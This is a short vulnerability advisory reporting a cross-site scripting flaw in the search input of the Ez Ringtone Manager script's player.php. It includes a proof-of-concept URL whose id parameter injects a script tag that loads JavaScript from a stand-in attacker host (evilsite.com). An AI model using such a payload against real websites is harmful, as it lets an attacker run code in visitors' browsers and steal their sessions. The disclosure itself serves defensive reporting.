Ez Ringtone Manager from scriptez.net - XSS

Ez Ringtone Manager Homepage: http://www.scriptsez.net Effected files: player.php search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT&cat=LG20Mobiles The search box doesnt properlly filter user input. Tags...